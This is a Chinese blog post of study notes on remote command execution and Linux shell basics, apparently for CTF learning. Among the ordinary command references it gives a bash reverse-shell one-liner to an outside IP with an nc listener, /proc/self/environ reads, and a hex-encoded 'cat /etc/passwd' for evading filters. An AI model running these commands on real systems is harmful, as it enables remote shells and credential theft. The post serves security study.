<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"mayylu.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.8.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="前言RCE英文全称：remote command&#x2F;code execute分为远程命令执行system和远程代码执行evel。">
<meta property="og:type" content="article">
<meta property="og:title" content="命令执行和linux">
<meta property="og:url" content="https://mayylu.github.io/2022/07/15/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%92%8Clinux/index.html">
<meta property="og:site_name" content="mayylu">
<meta property="og:description" content="前言RCE英文全称：remote command&#x2F;code execute分为远程命令执行system和远程代码执行evel。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/mayylu/pic@main/blogs/QQ%E6%88%AA%E5%9B%BE20220715162727.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/mayylu/pic@main/blogs/QQ%E6%88%AA%E5%9B%BE20220715211205.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/mayylu/pic@main/blogs/l4sij.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/mayylu/pic@main/blogs/se6sc.png">
<meta property="article:published_time" content="2022-07-15T13:04:19.000Z">
<meta property="article:modified_time" content="2023-03-06T09:53:10.243Z">
<meta property="article:author" content="mayylu">
<meta property="article:tag" content="rce">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/mayylu/pic@main/blogs/QQ%E6%88%AA%E5%9B%BE20220715162727.png">


<link rel="canonical" href="https://mayylu.github.io/2022/07/15/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%92%8Clinux/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://mayylu.github.io/2022/07/15/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%92%8Clinux/","path":"2022/07/15/命令执行和linux/","title":"命令执行和linux"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>命令执行和linux | mayylu</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">mayylu</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>







</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#rce%E2%80%93%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="nav-number">2.</span> <span class="nav-text">rce–命令执行</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#linux-%E6%96%87%E4%BB%B6"><span class="nav-number">2.1.</span> <span class="nav-text">linux 文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#linux%E5%91%BD%E4%BB%A4"><span class="nav-number">2.2.</span> <span class="nav-text">linux命令</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#shell%E5%91%BD%E4%BB%A4"><span class="nav-number">2.2.1.</span> <span class="nav-text">shell命令</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BE%93%E5%87%BA%E5%91%BD%E4%BB%A4"><span class="nav-number">2.2.2.</span> <span class="nav-text">输出命令</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AE%A1%E7%90%86%E7%9B%AE%E5%BD%95"><span class="nav-number">2.2.3.</span> <span class="nav-text">管理目录</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%9B%AE%E5%BD%95%E5%92%8C%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C"><span class="nav-number">2.2.4.</span> <span class="nav-text">目录和文件操作</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E6%9C%AC%E6%93%8D%E4%BD%9C"><span class="nav-number">2.2.5.</span> <span class="nav-text">文本操作</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96"><span class="nav-number">2.2.6.</span> <span class="nav-text">文件读取</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E6%89%80%E6%9C%89%E6%9D%83%E5%92%8C%E8%AE%BF%E9%97%AE%E6%9D%83%E9%99%90"><span class="nav-number">2.2.7.</span> <span class="nav-text">文件所有权和访问权限</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%AC%A6%E5%8F%B7"><span class="nav-number">2.3.</span> <span class="nav-text">常见符号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E4%B8%AD%E7%9A%84%E5%90%84%E7%A7%8D%E7%BB%95%E8%BF%87"><span class="nav-number">2.4.</span> <span class="nav-text">命令执行中的各种绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E7%A9%BA%E6%A0%BC"><span class="nav-number">2.4.1.</span> <span class="nav-text">绕过空格</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E5%88%86%E9%9A%94%E7%AC%A6"><span class="nav-number">2.4.2.</span> <span class="nav-text">绕过分隔符</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E5%85%B3%E9%94%AE%E5%AD%97"><span class="nav-number">2.4.3.</span> <span class="nav-text">绕过关键字</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6"><span class="nav-number">2.4.4.</span> <span class="nav-text">绕过长度限制</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0"><span class="nav-number">2.5.</span> <span class="nav-text">php命令执行函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87"><span class="nav-number">2.6.</span> <span class="nav-text">php命令执行绕过</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">mayylu</p>
  <div class="site-description" itemprop="description">关注生活的点点滴滴</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">22</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://mayylu.github.io/2022/07/15/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%92%8Clinux/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="mayylu">
      <meta itemprop="description" content="关注生活的点点滴滴">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="mayylu">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          命令执行和linux
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-07-15 21:04:19" itemprop="dateCreated datePublished" datetime="2022-07-15T21:04:19+08:00">2022-07-15</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2023-03-06 17:53:10" itemprop="dateModified" datetime="2023-03-06T17:53:10+08:00">2023-03-06</time>
      </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>RCE英文全称：remote command/code execute<br>分为远程命令执行system和远程代码执行evel。</p>
<span id="more"></span>

<h2 id="rce–命令执行"><a href="#rce–命令执行" class="headerlink" title="rce–命令执行"></a>rce–命令执行</h2><h3 id="linux-文件"><a href="#linux-文件" class="headerlink" title="linux 文件"></a>linux 文件</h3><ol>
<li>进程文件<br>/proc/sched_debug 正在运行的进程信息<br>/proc/net/wireless 无线网卡信息和基础信息</li>
</ol>
<p>pid是进程的标号：<br>/proc/pid/cmdline 是一个只读文件，包含进程的完整命令行信息<br>/proc/pid/cwd 包含了当前进程工作目录的一个链接<br>/proc/pid/environ 包含了可用进程环境变量的列表<br>/proc/pid/exe 包含了正在进程中运行的程序链接<br>/proc/pid/fd/ 这个目录包含了进程打开的每一个文件的链接<br>/proc/pid/mem 包含了进程在内存中的内容<br>/proc/pid/stat 包含了进程的状态信息<br>/proc/pid/statm 包含了进程的内存使用信息</p>
<p>self即当前进程<br>cat /proc/self/cmdline 获取当前启动进程的完整命令<br>ls -al /proc/self/cwd获取目标当前进程环境的运行目录<br>ls -al /proc/self/exe获得当前进程的可执行文件的完整路径<br>cat /proc/self/environ获取当前进程的环境变量信息<br>cat /proc/self/fd/{id}获取当前进程打开的文件内容<br>2. 内网文件<br>/etc/hosts<br>/proc/net/arp<br>/proc/net/fib_trie</p>
<h3 id="linux命令"><a href="#linux命令" class="headerlink" title="linux命令"></a>linux命令</h3><h4 id="shell命令"><a href="#shell命令" class="headerlink" title="shell命令"></a>shell命令</h4><p>bash -c 命令</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@kali:  bash -c whoami</span><br><span class="line">root</span><br></pre></td></tr></table></figure>
<p>bash -i 命令<br>以交互方式运行shell</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#    目标主机：</span></span><br><span class="line">root@kali:  bash -i &gt;&amp; /dev/tcp/124.220.165.133/2222 0&gt;&amp;1</span><br><span class="line"><span class="comment">#    接受主机：</span></span><br><span class="line">nc -lvp 2222</span><br></pre></td></tr></table></figure>
<h4 id="输出命令"><a href="#输出命令" class="headerlink" title="输出命令"></a>输出命令</h4><p>1.printf<br>printf 命令模仿 C 程序库（library）里的 printf() 程序,功能相近<br><code>$(printf &quot;\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64&quot;)</code><br>也可以简化<br><code> $&#39;\154\163&#39;</code>ls</p>
<h4 id="管理目录"><a href="#管理目录" class="headerlink" title="管理目录"></a>管理目录</h4><ol>
<li>cd命令(change directory)<br>~ 也表示为当前用户的家目录，. 则是表示目前所在的目录， .. 则表示目前目录位置的上一层目录。<br> cd        进入用户主目录<br> cd -      返回进入此目录之前所在目录<br> cd ..     返回上一级目录<br> cd ../..  返回上两级目录<br> cd !$    把上个命令的参数作为cd 参数使用<br> cd .      当前目录</li>
<li>ls命令(list)<br>ls 命令不仅可以查看 linux 文件夹包含的文件，而且可以查看文件权限<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">ls 文件名，若文件存在，输出文件名</span><br><span class="line">ls -a     列出目录所有文件，包含以.开始的隐藏文件</span><br><span class="line">ls -r     反序排列</span><br><span class="line">ls -R     递归处理，将指定目录下的所有文件及子目录一并处理；</span><br><span class="line">ls -t     以文件修改时间排序</span><br><span class="line">ls -S     以文件大小排序</span><br><span class="line"></span><br><span class="line">ls -l(ll) 除了文件名之外，还将文件的权限、所有者、文件大小等信息详细列出来</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<img src="https://cdn.jsdelivr.net/gh/mayylu/pic@main/blogs/QQ%E6%88%AA%E5%9B%BE20220715162727.png" alt="QQ截图20220715162727"></li>
</ol>
<p>蓝色表示目录; 绿色表示可执行文件; 红色表示压缩文件; 浅蓝色表示链接文件; 灰色表示其它文件; 红色闪烁表示链接的文件有问题了; 黄色是设备文件<br>3. dir命令(和 ls 命令类似)只不过用ls写入文件中时，每个文件名都是单独一行，它会自动换行，但dir就会全部写入一行中，并且会自动加空格<br>4. pwd 命令(print work directory)<br>用于查看当前工作目录路径,查看软链接的实际路径<code>pwd -P</code></p>
<h4 id="目录和文件操作"><a href="#目录和文件操作" class="headerlink" title="目录和文件操作"></a>目录和文件操作</h4><ol>
<li><p>mkdir命令(make directory) 用于创建文件夹</p>
</li>
<li><p>rmdir命令<br>注意：rmdir删除的目录dir必须是空目录，否则删除不掉dir这个目录。</p>
</li>
<li><p>touch 用于创建文件,相等于&gt;</p>
</li>
<li><p>mv 命令(move)<br>移动文件或修改文件名，根据第二参数类型（如目录，则移动文件；<br>如文件,则以此文件名重命名文件,并覆盖同名的原文件）<br>移动目录或修改目录，根据第二参数是否存在（目录名已存在，将移动目录到目录 中；<br>目录名不存在,则重命名目录并移动到目录所在位置使目录存在.)</p>
</li>
<li><p>cp 命令(copy)</p>
</li>
</ol>
<p> -f：覆盖已经存在的目标文件而不给出提示。<br> -p：除复制文件的内容外，还把修改时间和访问权限也复制到新文件中。<br> -r或-R：递归处理，将指定目录下的子文件和子目录一并处理（复制目录的时候使用）<br><code>[root@tjf328 ~]# cp  /root/a.txt  /tmp/</code><br>6. find命令<br>用来在指定目录下查找文件<br>实例：<br>将当前目录及其子目录下所有文件后缀为 .c 的文件列出来:<br><code># find . -name &quot;*.c&quot;</code><br>寻找根目录下所以flag开头的文件<br><code>find / -name flag*</code></p>
<ol start="7">
<li>rm 命令(remove)<br>可以直接使用 rm 命令删除文件； </li>
</ol>
<p>-r ：是 rm 命令的可选项，表示递归处理，将指定目录下的所有文件与子目录一并处理；<br>-f ：是 rm 命令的可选项，表示强制删除文件或目录<br>8. sh命令<br>将文件中的内容当作命令来执行，同时.也可以执行命令<br>例如：<br>. \a=sh \a</p>
<h4 id="文本操作"><a href="#文本操作" class="headerlink" title="文本操作"></a>文本操作</h4><p>grep 更适合单纯的查找或匹配文本<br>sed  更适合编辑匹配到的文本<br>awk  更适合格式化文本，对文本进行较复杂格式处理</p>
<ol>
<li>grep 命令<br>grep 指令会把含有范本样式的那一列显示出来,常用于文本搜索和选择输出<br>格式： grep -n ‘bash’ /etc/passwd</li>
</ol>
<p>-v： 显示不包含匹配文本的所有行。<br>-n： 显示匹配行及 行号<br>-i： 不区分大小写。<br>-r:  递归查找子目录。<br>2. awk 命令</p>
<ol start="3">
<li>sed 命令</li>
</ol>
<p>-e 脚本命令         该选项会将其后跟的脚本命令添加到已有的命令中。例如sed  -e “1p” -e “5p” 1.txt<br>-f 脚本命令文件     该选项会将其后文件中的脚本命令添加到已有的命令中。<br>-n                  默认情况下，sed 会在所有的脚本指定执行完毕后，会自动输出处理后的内容，而该选项会屏蔽启动输出，需使用 print 命令来完成输出。<br>-i                  此选项会直接修改源文件，要慎用。<br>    a ：新增， a 的后面可以接字串，而这些字串会在新的一行出现(目前的下一行)～<br>    c ：取代， c 的后面可以接字串，这些字串可以取代 n1,n2 之间的行！<br>    d ：删除，因为是删除啊，例如sed ‘/1/,/3/d’ data6.txt<br>    i ：插入， i 的后面可以接字串，而这些字串会在新的一行出现(目前的上一行)；<br>    p ：打印，亦即将某个选择的数据印出。通常 p 会与参数 sed -n 一起运行～<br>    s ：取代，可以直接进行取代的工作哩！通常这个 s 的动作可以搭配正则表达式！例如sed -n ‘s/test/trial/p’ data5.txt</p>
<ol start="4">
<li>tr<br>tr命令可以对来自标准输入的字符进行替换<br>tr [选项] 字符集合1 [字符集合2]<br>例：echo “HELLO WORLD” | tr ‘A-Z’ ‘a-z’</li>
<li>tee<br>用于读取标准输入的数据，并将其内容输出成文件,常用做写日志</li>
</ol>
<p>-a或–append 　附加到既有文件的后面，而非覆盖它</p>
<h4 id="文件读取"><a href="#文件读取" class="headerlink" title="文件读取"></a>文件读取</h4><ol>
<li>cat 命令(concatenate)<br>用于连接文件并打印到标准输出设备上</li>
<li>tac<br>Linux常用命令tac 刚好是将 cat 反写过来,所以他的功能就跟 cat 相反啦,<br>即tac 则是“ 由最后一行到第一行反向在屏幕上显示出来,行内的顺序不变</li>
<li>more 命令<br>cat的升级版, more 会以一页一页的显示方便使用者逐页阅读，而最基本的指令就是按空白键（space）就往下一页显示，按 b 键就会往回（back）一页显示。<br>（1）显示文件中从第3行起的内容<br>more +3 text.txt<br>（2）在所列出文件目录详细信息，借助管道使每次显示 5 行<br>ls -l | more -5</li>
<li>less<br>less 与 more 类似，less 可以随意浏览文件，支持翻页和搜索，支持向上翻页和向下翻页。 </li>
<li>head<br>head 命令可用于查看文件的开头部分的内容，有一个常用的参数 -n 用于显示行数，默认为 10，即显示 10 行的内容。<br> -q 隐藏文件名<br> -v 显示文件名<br> -c&lt;数目&gt; 显示的字节数。<br> -n&lt;行数&gt; 显示的行数。 </li>
<li>tail<br>tail 命令可用于查看文件的结尾部分的内容,tail -f filename ,会跟踪名为 filename的增长情况,会把 filename 文件里的最尾部的内容显示在屏幕上，并且不断刷新，只要 filename 更新就可以看到最新的文件内容。</li>
<li>nl<br>nl可以将输出的文件内容前自动的加上行号,整体来说，nl主要是对行号做更多的修饰。</li>
<li> rev命令<br>把每一行字符的顺序颠倒过来显示文件内容<br>若其后跟的是文件,则将文件每一行颠倒,但行的顺序不变</li>
</ol>
<h4 id="文件所有权和访问权限"><a href="#文件所有权和访问权限" class="headerlink" title="文件所有权和访问权限"></a>文件所有权和访问权限</h4><p><strong>ll命令详解</strong><br>文件类型<br>常规文件(-) ：文本文件和二进制文件<br>目录文件(d) ：目录文件是文件系统中一个目录所包含的目录项所组成的文件<br>设备文件(c or b) ：每种I/O设备对应一个设备文件，存放在 /dev 目录中。<br>管道文件(p) ：主要用于在进程间传递数据 ，又称先进先出(FIFO)文件<br>链接文件(L) ：链接又可以分为软链接（符号链接）和硬链接，它提供了共享文件的一种方法。</p>
<p>r：目录执行ls以列出目录内容；                             文件可读<br>w：目录创建、删除文件；                                   文件可写<br>x：可以cd切换进此目录，也可以使用ll查看内部文件的详细信息；  文件可执行</p>
<p>ls -l(ll) 除了文件名之外，还将文件的权限、所有者、文件大小等信息详细列出来<br>             7  rw  5  r  3  w  x    </p>
<ul>
<li><pre><code>rwx    rx    wx.           1          root  root      0       Sep 29 19:36          as 
</code></pre>
文件类型    u所有者,g组群,o其他人的权限 一级目录个数 所有者 所属的组 文件的大小 最近修改文件的最后日期 文件名<pre><code>    ----------a-------------
</code></pre>
</li>
</ul>
<ol>
<li>改变所属的用户组<br>chrgp [选项] 组名 文件名</li>
<li>改变所有者<br>chown [选项] 用户:组 文件名</li>
<li>修改文件访问权限<br>文字法<br>chmod a+w,o-x,ug–r 1.txt<br>数字法<br>chmod 644 2.txt</li>
</ol>
<ol start="4">
<li> ln命令<br>在链接目标目录中修改文件都会在源文件目录中同步变化。<br>软连接：ln –s 源文件 链接文件<br>是在选定的地方生成一个文件的映射，映射文件不占用磁盘空间，软链接可以 跨文件系统 ，硬链接不可以<br>修改存在的软连接： ln -nsf 源文件 链接文件</li>
</ol>
<p>硬链接：ln 源文件 链接文件<br>是在选定的位置生成一个文件的镜像，镜像文件与源文件同样大小，但不占用实际空间，不允许给目录创建硬链接。<br>删除链接：unlink 链接文件</p>
<h3 id="常见符号"><a href="#常见符号" class="headerlink" title="常见符号"></a>常见符号</h3><ul>
<li><p>\ 转义字符<br>放在特殊符号前，则该特殊符号的作用消失，放在指令的最末端，表示指令连接下一行</p>
</li>
<li><p>&lt;输出重定向</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">命令 &lt; 文件 	        将指定文件作为命令的输入设备</span><br><span class="line">命令 &lt; 文件 1 &gt; 文件 2 	将文件 1 作为命令的输入设备，该命令的执行结果输出到文件 2 中。</span><br><span class="line"></span><br><span class="line">命令 &lt;&lt; 分界符 	      “&lt;&lt;”则是一种特殊的重定向，是输入内容重定向到一个命令或脚本。</span><br><span class="line">ubuntu@VM-12-3-ubuntu:/$ ls &lt;&lt;eor</span><br><span class="line">&gt; eor</span><br><span class="line">apache2.conf  boot   data  docker </span><br><span class="line"></span><br><span class="line">命令 &lt;&lt;&lt; 参数         将指定字符串参数作为命令的输入</span><br><span class="line">ubuntu@VM-12-3-ubuntu:/$ ls&lt;&lt;&lt;/</span><br><span class="line">apache2.conf  boot   data  docker </span><br><span class="line">bash&lt;&lt;&lt;ls</span><br><span class="line">apache2.conf  boot   data  docker </span><br><span class="line">passwd --stdin root  &lt;&lt;&lt; &quot;123456&quot;== echo &quot;123456&quot; | passwd --stdin root</span><br></pre></td></tr></table></figure></li>
<li><blockquote>
<p>表示覆盖内容</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1, 通过&gt;来创建文件</span><br><span class="line"></span><br><span class="line">&gt;flag.txt</span><br><span class="line"></span><br><span class="line">2，通过&gt;将命令结果存入文件中</span><br><span class="line"></span><br><span class="line">echo &quot;hello hacker&quot; &gt; flag.txt</span><br><span class="line"></span><br><span class="line">3，&gt;&gt;符号的作用是将字符串添加到文件内容末尾，不会覆盖原内容</span><br><span class="line"></span><br><span class="line">echo &quot;hello hacker&quot; &gt;&gt; flag.txt</span><br></pre></td></tr></table></figure></li>
<li><p>‘’，””<br>单引号’’剥夺了所有字符的特殊含义，单引号’’内就变成了单纯的字符。<br>双引号””则对于双引号””内的参数替换($)和命令替换(``)是个例外。</p>
</li>
<li><p>{}<br>花括号拓展<br>如touch {a,b}.txt 结果为a.txt b.txt。<br>如：touch {a…d}.txt 结果为a.txt b.txt c.txt d.txt。</p>
</li>
<li><p>Linux中<code>$ &#123;&#125;</code>、<code>$()</code>、<code>$(())</code>的功能</p>
</li>
</ul>
<p><code>$&#123;&#125;</code></p>
<ol>
<li>对变量的替换，同$var。<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[root@cn21 ~]<span class="comment"># var=login</span></span><br><span class="line">[root@cn21 ~]<span class="comment"># echo &quot;aa$var&quot;</span></span><br><span class="line">aalogin</span><br><span class="line">[root@cn21 ~]<span class="comment"># echo &quot;$varaa&quot;</span></span><br><span class="line"></span><br><span class="line">[root@cn21 ~]<span class="comment"># echo &quot;$var aa&quot;</span></span><br><span class="line">login aa</span><br><span class="line">[root@cn21 ~]<span class="comment"># echo &quot;$&#123;var&#125;aa&quot; #注意此时大括号作用</span></span><br><span class="line">loginaa</span><br></pre></td></tr></table></figure></li>
<li>变量间接引用<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">ubuntu@VM-12-3-ubuntu:~$ <span class="built_in">echo</span> <span class="variable">$0</span></span><br><span class="line">-bash</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ <span class="built_in">echo</span> <span class="variable">$&#123;!?&#125;</span></span><br><span class="line">-bash</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ <span class="built_in">echo</span> <span class="variable">$&#123;!#&#125;</span></span><br><span class="line">-bash</span><br></pre></td></tr></table></figure></li>
<li>计算字符串长度<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">ubuntu@VM-12-3-ubuntu:~$ a=2</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ <span class="built_in">echo</span> <span class="variable">$&#123;a&#125;</span></span><br><span class="line">2</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ <span class="built_in">echo</span> <span class="variable">$&#123;#a&#125;</span></span><br><span class="line">1</span><br><span class="line"></span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ <span class="built_in">echo</span> <span class="variable">$&#123;##&#125;</span>//<span class="variable">$#</span>的值是0</span><br><span class="line">1</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ <span class="built_in">echo</span> <span class="variable">$&#123;#&#125;</span></span><br><span class="line">0</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ <span class="built_in">echo</span> <span class="variable">$&#123;###&#125;</span></span><br><span class="line">0</span><br></pre></td></tr></table></figure></li>
<li>返回上一条命令执行结束后的传回值<br><code>$&#123;?&#125;</code>    //表示0    用途：上一条命令执行结束后的传回值。通常0代表执行成功，非0代表执行有误。</li>
</ol>
<p><code>$()</code>：对命令的替换，同``（反引号）,查询失败返回就空，wh$(f1hgb)oa$(f1hgb)mi </p>
<p><code>$(())</code>:对内部内容进行整数运算$((var1*var2)),输出结果为十进制</p>
<ol>
<li><p>进制转换<br>将其他进制转换为十进制$((N#var))，其中N为进制。</p>
</li>
<li><p>位运算</p>
